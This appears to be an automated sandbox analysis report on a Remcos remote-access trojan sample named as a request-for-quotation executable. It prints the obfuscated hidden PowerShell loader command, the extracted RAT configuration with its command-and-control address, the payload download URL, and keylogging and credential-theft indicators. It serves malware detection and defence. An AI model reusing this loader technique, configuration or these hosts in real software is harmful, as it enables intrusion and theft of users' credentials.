Windows Analysis Report
RFQ NO 65-58003.exe

Overview

General Information

Sample name: RFQ NO 65-58003.exe
Analysis ID: 1577287
MD5: e4e7b853e87922ff59bcae3527b206f9
SHA1: 15e8dc7771a5b9ebeae4b64ccc20a8d9798158c2
SHA256: b4b7eab942bf5ffa93bef1444c82b059d3c18234bcec49df9ec2294bf0ec66bd
Tags: exe, RAT, RemcosRAT, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • RFQ NO 65-58003.exe (PID: 2448 cmdline: "C:\Users\user\Desktop\RFQ NO 65-58003.exe" MD5: E4E7B853E87922FF59BCAE3527B206F9)
    • powershell.exe (PID: 5272 cmdline: powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 4552 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5192 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 2196 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5680 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 6488 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 6644 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\irnfnubnwufuubhrkbjztnmhqi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 4060 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["212.162.149.91:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HSAM04", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
0000000E.00000003.2928845396.00000000056FF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000E.00000003.2898152047.0000000005709000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000E.00000003.2928001965.00000000056F7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000E.00000003.2899931678.0000000005709000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
(9 entries in the full report; first 5 shown)

System Summary

Source: Network Connection | Author: frack113 | Data: DestinationIp: 212.162.149.92, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4552, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49868
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish), CommandLine: powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ NO 65-58003.exe", ParentImage: C:\Users\user\Desktop\RFQ NO 65-58003.exe, ParentProcessId: 2448, ParentProcessName: RFQ NO 65-58003.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish), ProcessId: 5272, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4060, ProcessName: svchost.exe

Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 4552, TargetFilename: C:\ProgramData\remcos\logs.dat

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T11:05:16.487668+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49874 | 212.162.149.91 | 2404 | TCP
2024-12-18T11:05:18.671683+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49880 | 212.162.149.91 | 2404 | TCP
2024-12-18T11:05:18.878131+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.6 | 49881 | 178.237.33.50 | 80 | TCP
2024-12-18T11:05:13.562414+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49868 | 212.162.149.92 | 80 | TCP

AV Detection

Source: http://212.162.149.92/FbuhjxbSFSc116.bin | Avira URL Cloud: Label: malware
Source: 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["212.162.149.91:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HSAM04", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: RFQ NO 65-58003.exe | Virustotal: Detection: 13%
Source: Yara match | File source: 0000000E.00000003.2928845396.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.2898152047.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.2928001965.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.2899931678.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3391979783.000000000287F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.3221293540.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3394879441.00000000056B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.2896409361.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3395028821.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 4552, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: RFQ NO 65-58003.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: RFQ NO 65-58003.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Code function: 0_2_00406555 FindFirstFileW,FindClose,0_2_00406555
Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Code function: 0_2_0040287E FindFirstFileW,0_2_0040287E
Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Code function: 0_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405A03
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_212010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_212010F1
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_21206580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,14_2_21206580
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,17_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898

Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49874 -> 212.162.149.91:2404
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49880 -> 212.162.149.91:2404
Source: Malware configuration extractor | IPs: 212.162.149.91
Source: global traffic | TCP traffic: 192.168.2.6:49874 -> 212.162.149.91:2404
Source: global traffic | HTTP traffic detected:
    GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: UNREAL-SERVERSUS
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49881 -> 178.237.33.50:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49868 -> 212.162.149.92:80
Source: global traffic | HTTP traffic detected:
    GET /FbuhjxbSFSc116.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: 212.162.149.92
    Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 212.162.149.92 (50 identical entries in the report)
Source: global traffic | HTTP traffic detected:
    GET /FbuhjxbSFSc116.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: 212.162.149.92
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
Source: msiexec.exe, 0000000E.00000002.3407723975.00000000211D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000011.00000002.2923731406.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000003.2922976948.00000000030CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000011.00000002.2923731406.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000003.2922976948.00000000030CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: msiexec.exe, 0000000E.00000002.3407952469.0000000021650000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: msiexec.exe, 0000000E.00000002.3407952469.0000000021650000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3394879441.000000000568A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3407202116.0000000020880000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://212.162.149.92/FbuhjxbSFSc116.bin
Source: msiexec.exe, 0000000E.00000002.3394879441.000000000568A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.162.149.92/FbuhjxbSFSc116.binR
Source: bhv2FCF.tmp.17.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv2FCF.tmp.17.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: svchost.exe, 0000000D.00000002.3394216616.000002B99EE0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: bhv2FCF.tmp.17.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv2FCF.tmp.17.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv2FCF.tmp.17.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: qmgr.db.13.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.13.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.13.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.13.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.13.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.13.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.13.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.13.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2893965599.0000000005709000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3394879441.00000000056B5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2896409361.0000000005709000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2894834222.0000000005709000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp_
Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gphy
Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gphyq
Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpl
Source: RFQ NO 65-58003.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: bhv2FCF.tmp.17.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: msiexec.exe, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com
Source: msiexec.exe, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000003.2903653103.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000014.00000003.2903681348.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
Source: msiexec.exe, 0000000E.00000002.3407723975.00000000211D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: msiexec.exe, 00000014.00000003.2903653103.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000014.00000003.2903681348.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.compData
Source: msiexec.exe, 0000000E.00000002.3407723975.00000000211D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
Source: msiexec.exe, 00000011.00000002.2923342242.0000000002C74000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
Source: msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
Source: qmgr.db.13.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000D.00000003.2526974098.000002B99ED30000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: msiexec.exe, 00000011.00000002.2923434065.0000000002CBA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live
Source: msiexec.exe, 00000011.00000002.2923434065.0000000002CBA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oau.
Source: msiexec.exe, 00000011.00000002.2923731406.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000003.2922976948.00000000030CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfh
Source: msiexec.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: msiexec.exe, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: msiexec.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Windows\SysWOW64\msiexec.exe | Windows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exe
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Code function: 0_2_004054B0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard

              E-Banking Fraud

              Source: Yara match | File source: 0000000E.00000003.2928845396.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000003.2898152047.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000003.2928001965.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000003.2899931678.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
